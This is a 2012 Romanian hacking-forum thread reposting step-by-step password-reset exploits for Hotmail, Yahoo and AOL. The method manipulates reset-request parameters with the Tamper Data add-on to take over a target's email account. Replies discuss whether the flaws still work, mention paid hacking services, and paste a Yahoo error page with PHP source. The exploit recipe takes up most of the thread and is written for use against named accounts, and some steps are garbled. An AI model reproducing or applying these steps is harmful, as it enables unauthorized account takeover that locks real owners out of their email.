Yet Another Hotmail, AOL and Yahoo Password Reset 0Day Vulnerabilities

[ionut97]

Yesterday we Reported a 0-Day Vulnerability in Hotmail, which allowed hackers to reset account passwords and lock out the account's real owners. Tamper Data add-on allowed hackers to siphon off the outgoing HTTP request from the browser in real time and then modify the data.When they hit a password reset on a given email account they could fiddle the requests and input in a reset they chose.

Microsoft spokesperson confirmed the existence of the security flaw and the fix, but offered no further details: “On Friday, we addressed an incident with password reset functionality; there is no action for customers, as they are protected.”

Later Today another unknown hacker reported another similar vulnerabilities in Hotmail, Yahoo and AOL. Using same Tamper Data add-on attacker is able to Reset passwords of any account remotely. This is somewhat a critical Vulnerability ever exposed, Millions of users can effected in result.

Here Below Hacker Demonstrated Vulnerabilities:

Step 1. Go to this page https://maccount.live.com/ac/resetpwdmain.aspx .

Step 2. Enter the Target Email and enter the 6 characters you see.

Step 3. Start Tamper Data

Step 4. Delete Element "SendEmail_ContinueCmd"

Step 5. change Element "__V_previousForm" to "ResetOptionForm"

Step 6. Change Element "__viewstate" to "%2FwEXAQUDX19QDwUPTmV3UGFzc3dvcmRGb3JtZMw%2BEPFW%2 Fak6gMIVsxSlDMZxkMkI"

Step 7. Click O.K and Type THe new Password

Step 8. sTart TamperDaTa and Add Element "__V_SecretAnswerProof" Proof not constant Like the old Exploit "++++" You need new Proof Every Time

http://www.youtube.com/watch?feature=player_embedded&v=wdyDN82Egaw

2.Yahoo

Step 1. Go to this page https://edit.yahoo.com/forgot .

Step 2. EnTer the Target Email . and Enter the 6 characters you see .

Step 3. Start Tamper Data Delete

Step 4. change Element "Stage" to "fe200"

Step 5. Click O.K and Type The new Password

Step 6. Start Tamper Data All in Element Z

3.AOL

http://3.bp.blogspot.com/-e8PtNqMamkA/T5w58OgG-KI/AAAAAAAAF6g/88O-NuSiLHo/s640/1.png

Step 1. Go to Reset Page

Step 2. EnTer the Target Email . and Enter the characters you see .

Step 3. Start Tamper Data

Step 4. change Element "action" to "pwdReset"

Step 5. change Element "isSiteStateEncoded" to "false"

Step 6. Click O.K and Type THe new Password

Step 7. Start TamperDaTa All in Element rndNO

Step 8. done

Source:Yet Another Hotmail, AOL and Yahoo Password Reset 0Day Vulnerabilities | The Hacker News

[angelrusyan]

sa imi zica si mie cineva daca ia reusit

[Paul4games]

sa imi zica si mie cineva daca ia reusit

Din cate stiu eu au fost fixate dar acum 1-2 saptamani functionau fara nici o problema!

[Nytro]

Da, frumos...

[angelrusyan]

bine ca se afla acum ))

[Paul4games]

bine ca se afla acum ))

Pai ce vrei sa fie publicate exploituri ca astea pe forumuri publice?pe forumuri private aparuse acum ceva timp oameni care ofereau hacking srrvice cam la orice mail din alea de mai sus la 20$ si altele.

[CrashOverride]

am incercat eu la yahoo nu merge ...

[hirosima]

Clar, nu mai merge!

Oops...

There seem to be some problems.

We are experiencing some difficulties processing your request. This is most probably a temporary technical issue, so please try again shortly. If you receive this error again, please contact contact Customer Care for assistance.
function getCCUrl($udb_intl, $partner = ""){ $udb_intl = strtoupper($udb_intl); //for case insensitive comparisons $partner = strtoupper($partner); $ccUrl = ""; switch($udb_intl){ case 'US': $ccUrl = "https://io.help.yahoo.com/contact/index?locale=en_US&y=PROD_ACCT&page=contact"; break; case 'AA': $ccUrl = "https://io.help.yahoo.com/contact/index?locale=en_HK&y=PROD_ACCT&page=contact"; break; case 'AR': $ccUrl = "http://help.yahoo.com/l/ar/yahoo/edit/cgi_access.html"; break; case 'AU': $ccUrl = "https://io.help.yahoo.com/contact/index?locale=en_AU&y=PROD_ACCT&page=contact"; break; case 'BR': $ccUrl = "http://help.yahoo.com/l/br/yahoo/edit/general.html"; break; case 'CA': if ($partner == "ROGERS-ACS"){ $ccUrl = "https://secure.rogershelp.com/yahoo/contact/support/php/"; } else { $ccUrl = "https://io.help.yahoo.com/contact/index?locale=en_CA&y=PROD_ACCT&page=contact"; } break; case 'CF': if($partner == "ROGERS-ACS"){ $ccUrl = "https://secure.rogershelp.com/yahoo/contact/support/php/"; } else { $ccUrl = "http://help.yahoo.com/l/cf/yahoo/edit/general.html"; } break; case 'CL': $ccUrl = "http://help.yahoo.com/l/cl/yahoo/edit/cgi_access.html"; break; case 'CN': $ccUrl = "http://help.cn.yahoo.com/feedback.html?product=pw"; break; case 'CO': $ccUrl = "http://help.yahoo.com/l/co/yahoo/edit/forms_index.html"; break; case 'DE': $ccUrl = "http://help.yahoo.com/l/de/yahoo/edit/general.html"; break; case 'DK': $ccUrl = "http://help.yahoo.com/l/dk/yahoo/edit/general.html"; break; case 'E1': $ccUrl = "http://help.yahoo.com/l/e1/yahoo/edit/cgi_access.html"; break; case 'ES': $ccUrl = "http://help.yahoo.com/l/es/yahoo/edit/general.html"; break; case 'FI': $ccUrl = "http://help.yahoo.com/l/fi/yahoo/security/general.html"; break; case 'FR': $ccUrl = "http://help.yahoo.com/l/fr/yahoo/edit/general.html"; break; case 'GR': $ccUrl = "https://io.help.yahoo.com/contact/index?locale=en_US&y=PROD_ACCT&page=contact"; break; case 'HK': $ccUrl = "https://help.cc.hk.yahoo.com/feedback.html?id=2083"; break; case 'ID': $ccUrl = "http://help.yahoo.com/l/id/yahoo/edit/general.html"; break; case 'IN': $ccUrl = "https://io.help.yahoo.com/contact/index?locale=en_IN&y=PROD_ACCT&page=contact"; break; case 'IT': $ccUrl = "http://help.yahoo.com/l/it/yahoo/edit/general.html"; break; case 'KR': $ccUrl = "https://kr.helpboard.yahoo.com/helpfeedback/c_id.html"; break; case 'MX': $ccUrl = "http://help.yahoo.com/l/mx/yahoo/edit/cgi_access.html"; break; case 'MY': $ccUrl = "https://io.help.yahoo.com/contact/index?locale=en_MY&y=PROD_ACCT&page=contact"; break; case 'NL': $ccUrl = "https://io.help.yahoo.com/contact/index?locale=en_US&y=PROD_ACCT&page=contact"; break; case 'NO': $ccUrl = "http://help.yahoo.com/l/no/yahoo/edit/general.html"; break; case 'NZ': $ccUrl = "https://io.help.yahoo.com/contact/index?locale=en_NZ&y=PROD_ACCT&page=contact"; break; case 'PE': $ccUrl = "http://help.yahoo.com/l/pe/yahoo/edit/cgi_access.html"; break; case 'PH': $ccUrl = "https://io.help.yahoo.com/contact/index?locale=en_PH&y=PROD_ACCT&page=contact"; break; case 'PL': $ccUrl = "http://help.yahoo.com/l/pl/yahoo/edit/feedback.html"; break; case 'RO': $ccUrl = "http://help.yahoo.com/l/ro/yahoo/mail/ymail/technical.html"; break; case 'RU': $ccUrl = "http://help.yahoo.com/l/ru/yahoo/security/general.html"; break; case 'SE': $ccUrl = "http://help.yahoo.com/l/se/yahoo/edit/general.html"; break; case 'SG': $ccUrl = "https://io.help.yahoo.com/contact/index?locale=en_SG&y=PROD_ACCT&page=contact"; break; case 'TH': $ccUrl = "http://help.yahoo.com/l/th/yahoo/edit/forms_index.html"; break; case 'TR': $ccUrl = "http://help.yahoo.com/l/tr/yahoo/edit/general.html"; break; case 'TW': $ccUrl = "https://help.cc.tw.yahoo.com/feedback.html?id=3942"; break; case 'UK': case 'IE': $ccUrl = "https://io.help.yahoo.com/contact/index?locale=en_GB&y=PROD_ACCT&page=contact"; break; case 'VE': $ccUrl = "http://help.yahoo.com/l/ve/yahoo/edit/cgi_access.html"; break; case 'VN': $ccUrl = "http://help.yahoo.com/l/vn/yahoo/edit/avform.html"; break; case 'XA': $ccUrl = "http://support.maktoob.com/index.php?_m=knowledgebase&_a=view&parentcategoryid=89&pcid=0&nav=0general.html"; break; case 'XE': $ccUrl = "https://io.help.yahoo.com/contact/index?locale=en_JO&y=PROD_ACCT&page=contact"; break; case 'ZA': $ccUrl = "https://io.help.yahoo.com/contact/index?locale=en_ZA&y=PROD_ACCT&page=contact"; break; default: $ccUrl = "https://io.help.yahoo.com/contact/index?locale=en_US&y=PROD_ACCT&page=contact"; } return $ccUrl; } 

[ionut97]

Un video facut de un arab era public de pe 21.4.2012 si a fost fixata cam dupa o saptamana.Deci aveati timp o saptamana.

L.E:

"Publicat în 21.04.2012"

Edited April 30, 2012 by ionut97